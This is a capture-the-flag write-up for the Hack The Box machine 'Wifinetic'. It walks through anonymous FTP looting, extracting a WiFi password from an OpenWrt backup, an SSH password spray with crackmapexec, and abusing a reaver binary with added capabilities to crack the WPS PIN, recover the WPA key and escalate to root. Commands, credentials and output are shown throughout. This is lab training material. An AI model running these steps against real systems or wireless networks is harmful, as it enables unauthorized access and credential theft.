HTB - Wifinetic | serioton

Nmap Scan

As always let’s start with a basic port scan

# Nmap 7.94 scan initiated Sat Sep 16 14:10:16 2023 as: nmap -sC -sV -oA nmap/wifinetic --min-rate=10000 10.10.11.247
Nmap scan report for 10.10.11.247
Host is up (0.089s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE    VERSION
21/tcp open  ftp        vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.19
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp          4434 Jul 31 11:03 MigrateOpenWrt.txt
| -rw-r--r--    1 ftp      ftp       2501210 Jul 31 11:03 ProjectGreatMigration.pdf
| -rw-r--r--    1 ftp      ftp         60857 Jul 31 11:03 ProjectOpenWRT.pdf
| -rw-r--r--    1 ftp      ftp         40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r--    1 ftp      ftp         52946 Jul 31 11:03 employees_wellness.pdf
22/tcp open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
53/tcp open  tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 16 14:10:29 2023 -- 1 IP address (1 host up) scanned in 12.56 seconds

We have three open ports: FTP on port 21, SSH on port 22, and DNS on port 53.

FTP

From the Nmap scan, we can see we have anonymous login allowed via FTP, so let’s poke at that:

~/HTB/wu/Wifinetic ❯ ftp 10.10.11.247
Connected to 10.10.11.247.
220 (vsFTPd 3.0.3)
Name (10.10.11.247:ahmed): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||45061|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp          4434 Jul 31 11:03 MigrateOpenWrt.txt
-rw-r--r--    1 ftp      ftp       2501210 Jul 31 11:03 ProjectGreatMigration.pdf
-rw-r--r--    1 ftp      ftp         60857 Jul 31 11:03 ProjectOpenWRT.pdf
-rw-r--r--    1 ftp      ftp         40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
-rw-r--r--    1 ftp      ftp         52946 Jul 31 11:03 employees_wellness.pdf
226 Directory send OK.

We can download each file to our local machine and take a look at it, but I prefer to use wget to download all of them recursively. I will use the following command to do that:

1	wget -r ftp://10.10.11.247

Now, wget will connect to the FTP server and download all the files:

...
FINISHED --2023-09-17 12:04:14--
Total wall clock time: 18s
Downloaded: 5 files, 2.5M in 13s (200 KB/s)

Upon completion, a directory named after the machine’s IP address is created, housing all the files:

~/HTB/wu/Wifinetic ❯ ls -lah 10.10.11.247                                                              
total 2.6M
drwxr-xr-x 2 ahmed ahmed 4.0K Sep 17 12:04 .
drwxr-xr-x 3 ahmed ahmed 4.0K Sep 17 12:03 ..
-rw-r--r-- 1 ahmed ahmed  40K Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
-rw-r--r-- 1 ahmed ahmed  52K Jul 31 11:03 employees_wellness.pdf
-rw-r--r-- 1 ahmed ahmed 4.4K Jul 31 11:03 MigrateOpenWrt.txt
-rw-r--r-- 1 ahmed ahmed 2.4M Jul 31 11:03 ProjectGreatMigration.pdf
-rw-r--r-- 1 ahmed ahmed  60K Jul 31 11:03 ProjectOpenWRT.pdf

The primary point of interest within the text and PDF files are two usernames, potentially useful for a subsequent password spray:

1 2	olivia.walker17 samantha.wood93

The remaining file to inspect is the OpenWrt backup tar file. I will extract it using the following command:

~/HTB/wu/Wifinetic/ftp ❯ tar xvf backup-OpenWrt-2023-07-26.tar   
./etc/
./etc/config/
./etc/config/system
./etc/config/wireless
./etc/config/firewall
./etc/config/network
./etc/config/uhttpd
./etc/config/dropbear
./etc/config/ucitrack
./etc/config/rpcd
./etc/config/dhcp
./etc/config/luci
./etc/uhttpd.key
./etc/uhttpd.crt
./etc/sysctl.conf
./etc/inittab
./etc/group
./etc/opkg/
./etc/opkg/keys/
./etc/opkg/keys/4d017e6f1ed5d616
./etc/hosts
./etc/passwd
./etc/shinit
./etc/rc.local
./etc/dropbear/
./etc/dropbear/dropbear_ed25519_host_key
./etc/dropbear/dropbear_rsa_host_key
./etc/shells
./etc/profile
./etc/nftables.d/
./etc/nftables.d/10-custom-filter-chains.nft
./etc/nftables.d/README
./etc/luci-uploads/
./etc/luci-uploads/.placeholder

The extraction yields an ‘etc’ directory containing several intriguing files. A quick online search reveals that OpenWrt config files are typically located in /etc/config/:

1 2	~/HTB/wu/Wifinetic/ftp/etc/config ❯ ls dhcp dropbear firewall luci network rpcd system ucitrack uhttpd wireless

If you look around, you can eventually find this key right here:

config wifi-iface 'wifinet0'
        option device 'radio0'
        option mode 'ap'
        option ssid 'OpenWrt'
        option encryption 'psk'
        option key 'VeRyUniUqWiFIPasswrd1!'
        option wps_pushbutton '1'

It looks like this is the WiFi password. I’ll try to spray it using the previously acquired usernames and the netadmin user from the passwd file. I made a usernames.txt file and put our 3 obtained usernames there:

~/HTB/wu/Wifinetic ❯ cat usernames.txt     
olivia.walker17
samantha.wood93
netadmin

Now we can use crackmapexec to do a password spray on the ssh server since this is the only thing we can authenticate to

~/HTB/wu/Wifinetic ❯ cme ssh 10.10.11.247 -u usernames.txt -p 'VeRyUniUqWiFIPasswrd1!'
SSH         10.10.11.247    22     10.10.11.247     [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9
SSH         10.10.11.247    22     10.10.11.247     [-] olivia.walker17:VeRyUniUqWiFIPasswrd1! Authentication failed.
SSH         10.10.11.247    22     10.10.11.247     [-] samantha.wood93:VeRyUniUqWiFIPasswrd1! Authentication failed.
SSH         10.10.11.247    22     10.10.11.247     [+] netadmin:VeRyUniUqWiFIPasswrd1!  - shell access!

The results confirm that the netadmin user can access the shell using the identified password.

Shell

~/HTB/wu/Wifinetic ❯ ssh netadmin@10.10.11.247
netadmin@10.10.11.247's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 17 Sep 2023 11:21:12 AM UTC

  System load:            0.02
  Usage of /:             64.2% of 4.76GB
  Memory usage:           6%
  Swap usage:             0%
  Processes:              222
  Users logged in:        0
  IPv4 address for eth0:  10.10.11.247
  IPv6 address for eth0:  dead:beef::250:56ff:feb9:3ba3
  IPv4 address for wlan0: 192.168.1.1
  IPv4 address for wlan1: 192.168.1.23

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Sep 17 11:21:04 2023 from 10.10.14.19
netadmin@wifinetic:~$

We can get the user flag

netadmin@wifinetic:~$ ls
user.txt
netadmin@wifinetic:~$ cat user.txt 
af074d87ad615b046a44d840727b3487

Privesc

The first things I always try when getting a shell is sudo -l to see what commands I can run with sudo but without a password. In this case our user can’t run sudo as shown below

1
2
3

netadmin@wifinetic:~$ sudo -l
[sudo] password for netadmin: 
Sorry, user netadmin may not run sudo on wifinetic.

We can look for setuid binaries and other basic stuff since this is an easy machine. Or we can try to run linpeas and let it do its thing. Eventually, we can find an interesting capability using this command:

1	getcap -r / 2>/dev/null

This command searches for files with special capabilities set on the root directory and its subdirectories, while suppressing error messages.

netadmin@wifinetic:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep

We have a binary called reaver which when we google it we can find that it is a tool used to brute force attack against Wi-Fi Protected Setup (WPS) PINs to recover WPA/WPA2 passphrases. So how can we abuse this ?
If we try to run the binary, it will output the help menu and an example of how to use it

1 2	Example: /usr/bin/reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv

We need 2 pieces: the monitor-mode interface and the BSSID. To get them we can run this command

netadmin@wifinetic:~$ iwconfig 
wlan2     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
wlan1     IEEE 802.11  ESSID:"OpenWrt"  
          Mode:Managed  Frequency:2.412 GHz  Access Point: 02:00:00:00:00:00   
          Bit Rate:5.5 Mb/s   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          Link Quality=70/70  Signal level=-30 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:9   Missed beacon:0

eth0      no wireless extensions.

hwsim0    no wireless extensions.

mon0      IEEE 802.11  Mode:Monitor  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
lo        no wireless extensions.

wlan0     IEEE 802.11  Mode:Master  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

We got the monitor-mode interface, which is mon0, and the BSSID, which is 02:00:00:00:00:00. Now we just need to execute the reaver tool with the arguments we got

netadmin@wifinetic:~$ /usr/bin/reaver -i mon0 -b 02:00:00:00:00:00 -vv

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 02:00:00:00:00:00
[+] Switching mon0 to channel 1
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 1 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.

Quickly, we found the wpa password which is WhatIsRealAnDWhAtIsNot51121!.
We can try to su to root using this password

netadmin@wifinetic:~$ su root
Password: 
root@wifinetic:/home/netadmin# cat /root/root.txt 
49e918ab2bd90752f62db31a05cc6a97

This indeed worked, and we got a shell as root.
That was the box, Thank you for reading. Hope you learned something :)